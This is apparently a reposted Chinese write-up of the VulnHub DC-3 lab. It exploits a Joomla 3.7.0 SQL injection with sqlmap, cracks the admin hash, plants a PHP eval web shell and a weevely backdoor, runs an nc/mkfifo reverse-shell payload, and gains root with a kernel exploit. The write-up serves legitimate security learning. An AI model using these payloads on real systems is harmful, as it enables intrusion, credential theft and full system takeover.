zoukankan      html  css  js  c++  java
  • vulnhub靶场DC-3

    0x01  信息收集

    DC-3靶机用Vmfusion启动提示需要将磁盘/CD-ROM 从“ide0:1”移到“ide0:0”,windows版本可以直接从高级设置更改,mac版没有这个选项,换用Virtualbox虚拟.提示找不到物理网卡Realtek PCIe FE Family Controller,更改默认网络设置,桥接模式->内部网络,启动成功

    首先还是查看攻击机ip,并找到目标机

    也可以用netdiscover寻找

    netdiscover -r 192.168.5.1/24 //查看子网192.168.5中所有主机

    netdiscover是一个更快速,最简单的程序,它不会显示有关目标客户端的非常详细的信息

    它只会向我们展示他们的IP地址,MAC地址,有时还会向我们展示硬件制造商

    只开放了80端口,访问看看

      

    是一个Joomla站

    这次用Nikto扫目录

    nikto -h 192.168.5.6

    发现后台登录界面

     对网站进行指纹识别

    whatweb 192.168.5.6

     用joomscan扫版本等信息

    joomscan -u http://192.168.5.6

    0x02  尝试攻击

    kali搜索对应版本的漏洞

    searchsploit joomla 3.7.0

    有一个sql漏洞,保存漏洞信息并查看

    cp /usr/share/exploitdb/exploits/php/webapps/42033.txt /joomla_sql.txt

     

    使用注入点信息

    sqlmap -u "http://localhost/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent --dbs -p list[fullordering] 

     查询当前数据库

    --current-db

    查当前数据库下的表

    -D 'joomladb' --tables

     

     获取#__users中的列名

    -D 'joomladb' -T '#__users' --columns

     查字段

    -D 'joomladb' -T '#__users' -C 'name,password' --dump

     把加密的写入文件破解

    john 1.txt

    登录后台,收集信息

     找到可以执行代码的地方

     从外部可以访问的位置写入一句话木马,蚁剑连接

    <?php @eval($_POST['a']);?>

    建立反弹连接,这里使用两种方式

    PHP代码反弹shell建立连接,kali监听1337端口,执行文件后没有成功(建立成功后利用py伪终端进一步操作)

    nc -lvp 1337 //kali监听1337端口

    <?php system('rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.5.6 1337 >/tmp/f');?>

     

     使用Weevely工具建立

    生成服务端

    weevely generate <password> <path>

    weevely generate 123 shell.php //密码:123456 脚本文件名:shell.php

     

    上传脚本

    连接服务端,获得shell

    weevely <URL> <password> [cmd] 

    查看系统信息 

    uname -a

     搜寻对应版本漏洞提权

     选一个合适的,放入/root目录下

    cp /usr/share/exploitdb/exploits/linux/local/39772.txt /root

     

    打开查看漏洞介绍,找到地址下载exp(下载失败/缓慢,换物理机下载),玩成后解压

    unzip 39772.zip

     进入文件夹,解压脚本tar包,可以使用

    tar-xvf exploit.tar //解压exploit提权脚本tar包

    蚁剑上传39772.zip到/var/tmp目录下

     解压并执行脚本

    ./compile.sh //执行脚本,编译代码文件

    ./doubleput //执行提权文件

     

  • 相关阅读:
    SLF4J: Failed to load class "org.slf4j.impl.StaticLoggerBinder"
    Tomcat跨域
    Invalid bean definition with name 'dataSource' defined in class path resource [applicationContext.xml]
    网速测试
    程序员实用工具网站
    安装wls报(主清单位置 "/u01/app/oracle/inventory" 无效 (无法读取/写入/执行))
    pom.xml
    CUDA -- 内存分配
    最长上升子序列(LIS: Longest Increasing Subsequence)
    实例化渲染
  • 原文地址:https://www.cnblogs.com/-saber/p/14558971.html
Copyright © 2011-2022 走看看